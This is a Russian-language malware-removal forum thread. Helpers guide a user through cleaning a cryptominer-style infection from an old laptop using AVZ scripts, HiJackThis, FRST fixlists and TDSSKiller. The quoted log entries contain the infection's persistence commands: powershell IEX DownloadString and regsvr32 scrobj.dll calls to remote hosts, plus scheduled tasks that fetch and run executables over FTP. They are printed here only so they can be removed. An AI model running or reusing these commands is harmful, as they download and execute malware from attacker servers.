Перейти к содержанию

[РЕШЕНО] Постоянные тормоза ноутбука [Rootkit.Boot.DarkGalaxy.a]


Рекомендуемые сообщения

Дано - старинный ноутбук который серфил черт знает что в течение 3х лет.(пользовался пенсионер)
Жесткие тормоза, постоянные вылеты непонятных окон и так далее.

Логи ниже, буду рад помощи.

CollectionLog-2020.01.05-20.47.zip

  • Спасибо (+1) 1
Ссылка на сообщение
Поделиться на другие сайты
Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.

 

Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.

 

Здравствуйте! 

 


 

Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 



begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\update.exe>','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.


 

Внимание! Будет выполнена перезагрузка компьютера. 

 

Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).

 



O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"


 

Сделайте новые логи Автологгером. 

 

  • Спасибо (+1) 1
Ссылка на сообщение
Поделиться на другие сайты

 

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
 
Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.
 
Здравствуйте! 
 
 
Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 
begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\update.exe>','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.
 
Внимание! Будет выполнена перезагрузка компьютера. 
 
Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).
 
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
 
Сделайте новые логи Автологгером. 

 

Так же ноутбук не автозагружает антивирус eset.  После установки он просто висит в панели пуск и не запускается даже по клику. После выполнения скрипта так же периодически компьютер уходит в перезагрузку без каких либо ошибок.

CollectionLog-2020.01.05-23.10.zip

Ссылка на сообщение
Поделиться на другие сайты
Пофиксите следующие строчки в HiJackThis
 
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/05)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
 

 
Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 
begin
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
ExecuteSysClean;
ExecuteWizard('TSW',2,2,true);
RebootWindows(true);
end.
 
Внимание! Будет выполнена перезагрузка компьютера. 
 

Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.
 
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
3munStB.png
 

 

  • Согласен 1
Ссылка на сообщение
Поделиться на другие сайты

PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"


PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"

Ссылка на сообщение
Поделиться на другие сайты

С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. 

Прикрепляю все необходимое

CollectionLog-2020.01.06-11.23.zip

Addition.txt

FRST.txt

Ссылка на сообщение
Поделиться на другие сайты
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)
2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat
2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s
2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p
2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Сделайте новые логи FRST. 

  • Согласен 1
Ссылка на сообщение
Поделиться на другие сайты

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)
2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat
2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s
2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p
2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 
Сделайте новые логи FRST. 

 

FRST.txt

Addition.txt

Fixlog.txt

Ссылка на сообщение
Поделиться на другие сайты
  1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;

Запустите файл TDSSKiller.exe.

Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.

В процессе проверки могут быть обнаружены объекты двух типов:

вредоносные (точно было установлено, какой вредоносной программой поражен объект);

подозрительные (тип вредоносного воздействия точно установить невозможно).


[*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.

[*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.

[*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).

[*]Самостоятельно без указания консультанта ничего не удаляйте!!!

[*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.

[*]Прикрепите лог утилиты к своему следующему сообщению

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).


Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt

Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt
Ссылка на сообщение
Поделиться на другие сайты

 

  • Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
  • Запустите файл TDSSKiller.exe.
  • Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
  • В процессе проверки могут быть обнаружены объекты двух типов:
    •  
  • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
  • подозрительные (тип вредоносного воздействия точно установить невозможно).
  • По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
  • Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
  • Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
  • Самостоятельно без указания консультанта ничего не удаляйте!!!
  • После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
  • Прикрепите лог утилиты к своему следующему сообщению
  • По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

 

Два лога, после первой проверки и после перезагрузки

TDSSKiller.3.1.0.28_06.01.2020_20.46.47_log.txt

TDSSKiller.3.1.0.28_06.01.2020_20.49.34_log.txt

Ссылка на сообщение
Поделиться на другие сайты
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe
Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)
2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Сделайте новые логи FRST.

Ссылка на сообщение
Поделиться на другие сайты

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe
Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)
2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
